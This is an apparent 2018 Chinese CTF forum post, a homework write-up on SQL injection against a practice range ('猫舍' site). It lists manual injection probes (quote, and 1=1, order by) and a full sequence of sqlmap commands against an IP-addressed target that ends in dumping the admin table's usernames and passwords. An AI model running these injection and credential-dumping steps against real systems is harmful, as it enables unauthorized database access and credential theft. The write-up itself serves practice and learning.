靶场1 注入攻击原理 956作业

qq577522448   ·   发表于 2018-08-17 14:32:24   ·   CTF&WP专版

1.首先打开靶场网址查看新闻在id=1后面加个单引号出现错误看不到内容

 2.在用adn 1=1  显示正常 adn 1=2 显示错误,所以是存在注入的

3.然后在来差注入点 先order by 10  显示错误

 4.直到order by 2 才显示正常,注入点为2

  5.查一下有多少个字段,查出有两个字段

6.再查一下数据库版本7.爆出数据库名8.接下来查询表名9.最后查询密码10.sqlmap工具注入,sqlmap.py -u"http://120.203.13.75:6815/?id=1"发现能够注入

11.sqlmap.py -u"http://120.203.13.75:6815/?id=1" --dbs    找出库名

12.查到有2个库,第一个为系统库,第二个就是猫舍的库直接列出猫舍所有表   sqlmap.py -u"http://120.203.13.75:6815/?id=1" --tables -D"maoshe"

13.看到有4个表,一般管理员密码都在ADMIN表中所以查表中的字段sqlmap.py -u"http://120.203.13.75:6815/?id=1" --columns -D"maoshe" -T"admin"

14.直接输出账号密码  sqlmap.py -u"http://120.203.13.75:6815/?id=1" --dump -D"maoshe" -T"admin" -C"username,password"

打赏我,让我更有动力~

0 条回复   |  直到 2018-8-17 | 1456 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.